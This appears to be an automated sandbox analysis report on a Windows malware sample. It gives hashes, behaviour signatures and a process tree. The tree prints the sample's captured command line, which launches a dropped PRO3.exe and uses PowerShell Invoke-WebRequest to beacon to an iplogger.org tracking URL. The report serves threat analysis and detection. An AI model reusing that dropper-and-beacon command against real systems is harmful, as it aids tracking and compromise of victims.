Analysis
-
max time kernel
7s -
max time network
11s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
05-02-2022 12:41
Static task
static1
Behavioral task
behavioral1
Sample
d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe
Resource
win7-en-20211208
General
-
Target
d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe
-
Size
1.8MB
-
MD5
80286211e348fb262323c664430553f2
-
SHA1
c9a55f6c23c55d33925635fcee5fb72ad4c3f001
-
SHA256
d23aaa6690b8141985a4237e4660246f83a59460d1fc7c614ae88eeea9d7fd4a
-
SHA512
9cbd4b8b5622879180ea23859cd2611c093673231ba1567a2dff0198998861c68eac7cf9a830b498af121c79fe5c06aea67b7dab429af8c3e58b84d1bc42f122
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
PRO3.exepid process 700 PRO3.exe -
Loads dropped DLL 1 IoCs
Processes:
d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exepid process 4064 d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\PRO3.exe pdf_with_link_action -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
d23aaa6690b8141985a4237e4660246f83a59460d1fc7.execmd.exedescription pid process target process PID 4064 wrote to memory of 2056 4064 d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe cmd.exe PID 4064 wrote to memory of 2056 4064 d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe cmd.exe PID 4064 wrote to memory of 2056 4064 d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe cmd.exe PID 2056 wrote to memory of 700 2056 cmd.exe PRO3.exe PID 2056 wrote to memory of 700 2056 cmd.exe PRO3.exe PID 2056 wrote to memory of 700 2056 cmd.exe PRO3.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe"C:\Users\Admin\AppData\Local\Temp\d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "PRO3.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\PRO3.exe"PRO3.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\PRO3.exeMD5
aeb230e71336c19457a6e3443fe1ef8e
SHA1552884c4e035b011b01bb244679f06b6e95d4980
SHA256ad1c4836f2ab049f7ed8f3dd43947d197498f92303307bdcbab2d9b52a20188a
SHA51294a75af2a58d91a4c15556f51f8c132e57d29a2005140876accfe0fbaaecaef851c618e0c0f31d035eb0b0a5d8e27d0844b0e7d2278cfb3efa593badfee60914
-
C:\Users\Admin\AppData\Local\Temp\nsl4218.tmp\M17UDIQ8KE.dllMD5
293165db1e46070410b4209519e67494
SHA1777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA25649b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA51297012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19